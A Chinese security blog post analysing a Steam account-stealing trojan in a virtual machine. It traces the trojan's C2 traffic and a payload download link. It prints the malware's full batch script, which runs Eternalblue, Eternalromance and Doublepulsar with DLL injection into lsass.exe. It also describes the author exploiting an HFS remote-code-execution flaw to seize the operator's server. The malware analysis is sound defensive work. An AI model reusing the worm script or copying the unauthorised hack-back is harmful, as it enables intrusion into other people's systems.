Steam盗号的背后 – 作者:joe119

前言

偶然看到一个steam盗号的视频,里面通过软件生成木马,打开之后如果输入了steam的账号密码,账号密码就会被盗取,如果那个电脑还登录了qq,甚至还可以通过登录qq邮箱来重置steam的密码(没有手机令牌,登录的qq邮箱为绑定steam的邮箱)。1593354228_5ef8a7f49a9ca.png!small

1593354241_5ef8a80170155.png!small

在不可描述的交易之后,我拿到的样本

1593354253_5ef8a80da7789.png!small

解压,丢到了虚拟机

分析

首先看了一下目录,里面好多fne格式结尾的文件,在文件夹的最后一行看到了客户端

1593354267_5ef8a81bc5c19.png!small

这又大又闪的图标,难道是传说中的更换图标免杀么,我赶紧下载了图中的杀软,测试了一下

1593354279_5ef8a8271eaf3.png!small

1593354316_5ef8a84c33123.png!small

首先是断网测试的,打开软件试一试

1593354326_5ef8a8565c801.png!small

哦吼,竟然还敢直接放qq出来

1593354337_5ef8a86115bd2.png!small

打开网站

1593354357_5ef8a875931ee.png!small

这难道就是真正的黑客吗

1593354368_5ef8a88008ccd.jpg!small

虚拟机联网,再次打开软件

1593354377_5ef8a889b8370.png!small

通过wireshark看一下流量

1593354387_5ef8a8931738d.png!small

首先返回了我的登录ip,之后返回了版本信息,最后返回了通知

注册一个账户登录一下

1593354399_5ef8a89f55b1f.png!small

登录之后在不断的请求服务器,判断是否获取到新的账号密码

1593354414_5ef8a8ae02cf5.png!small

生成一个木马

1593354423_5ef8a8b7b2f3e.png!small

直接就在虚拟机打开

在看流量的时候发现了一个rj.txt

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 15 Jun 2020 20:10:00 GMT
Accept-Ranges: bytes
ETag: "6e3317f35043d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 28 Jun 2020 09:11:18 GMT
Content-Length: 120

http://note.youdao.com/yws/public/resource/ad9c19d74a1ee52aac35d1b1bab19b99/xmlnote/A33ECF11E57E4599B93D54D74F14C11B/335

之后的流量应该是下载了一个文件

1593354443_5ef8a8cb5607a.png!small

等待文件下载完之后,看到了一串异常的流量

1593354457_5ef8a8d915762.png!small

在遍历这个c段,感觉事情有点不妙,回头一看虚拟机已经蓝屏重启了…

1593354470_5ef8a8e65c22c.png!small

把样本丢到微步

1593354493_5ef8a8fd0fa00.png!small

1593354505_5ef8a909a2f40.png!small

果然,在扫内网的永恒之蓝

1593354515_5ef8a9133df33.png!small

可能因为虚拟机分配的内存比较小,所以一打就蓝屏了

接下来找到下载的文件

1593354522_5ef8a91a63225.png!small

发现了攻击脚本

把虚拟机的内存调整为6g,之后更改脚本配置,直接打虚拟机

@echo off
mode con cols=100 lines=50&color 0c
set a=127.0.0.1
Eternalblue-2.2.0.exe --TargetIp %a% --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll --DllPayload dll\64.dll
Eternalblue-2.2.0.exe --TargetIp %a% --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll --DllPayload dll\86.dll

Eternalblue-2.2.0.exe --TargetIp %a% --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll --DllPayload Eternalblue.dll
Eternalblue-2.2.0.exe --TargetIp %a% --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll --DllPayload Doublepulsar.dll

Eternalromance-1.4.0.exe --TargetIp %a% --Target WIN72K8R2 --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload dll\64.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target XP --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload dll\86.dll

Eternalromance-1.4.0.exe --TargetIp %a% --Target WIN72K8R2 --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload Eternalblue.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target XP --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload Doublepulsar.dll

echo %a%>>goodlog.txt
exit

发现请求了另一台主机,并且下载了文件

1593354533_5ef8a9255fb64.png!small

打开网站

1593354546_5ef8a932122e2.png!small

已经有了2400多次的下载

看一下本地建立的链接

1593354563_5ef8a943c1d2d.png!small

这个8000端口对应的ip应该就是对方的c2了

下载的文件继续放到微步分析

1593354574_5ef8a94e4758f.png!small

在shodan查看一下端口信息

1593354581_5ef8a955d4ec7.png!small

在他的hfs服务上存在命令执行漏洞(hfs2.3c及以前的2.3x版本存在rce)

图片[28]-Steam盗号的背后 – 作者:joe119-安全小百科设置好参数,攻击成功后,获得截图

图片[29]-Steam盗号的背后 – 作者:joe119-安全小百科现在对方已经修复漏洞

图片[30]-Steam盗号的背后 – 作者:joe119-安全小百科

尾声

拿下对方服务器没多久,攻击行为被对方发现,并且修补了漏洞,在日常下载软件的时候一定要在正规途径下载,使用杀软(多少有些作用)保护自己电脑的安全。

来源:freebuf.com 2020-07-05 11:38:06 by: joe119

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论